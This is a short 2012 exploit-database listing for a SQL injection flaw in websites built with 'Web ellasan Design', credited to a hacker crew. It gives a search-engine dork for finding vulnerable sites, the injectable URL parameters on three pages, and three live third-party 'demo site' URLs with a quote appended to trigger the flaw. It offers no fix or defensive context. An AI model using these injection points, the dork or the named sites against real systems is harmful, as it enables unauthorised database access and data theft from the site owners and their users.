Web ellasan Design [SQL injection Vulnerability]



EKU-ID: 2125 CVE: OSVDB-ID:
Author: Becax Published: 2012-05-15 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


# Exploit Title: Web ellasan Design [SQL injection Vulnerability]
# Author: Becax
# Home : CrimeIRCD
---------------------------------------------------------------------!
# Email : tomier2010@yahoo.com
# Category: [webapps]
# Version: n/a
# Google dork: "powered by ellasan"
# Tested on: wind7
---------------------------------------------------------------------!
# Exploit : http://localhost/products.php?catid=[sQl]
http://localhost/categories.php?catid=[sQl]
http://localhost/creations.php?categoryid=[sQl]
# Demo site: http://www.vosnakis.gr/english/products.php?catid=3%27
http://www.chrysmetal.com/english/categories.php?catid=5%27
http://www.ellasanweb.gr/creations.php?categoryid=10%27
---------------------------------------------------------------------!

Special thanks : CrimeIRCD staff, AHA,Hew, All member #unix, and my Dji sam soe Filter & Google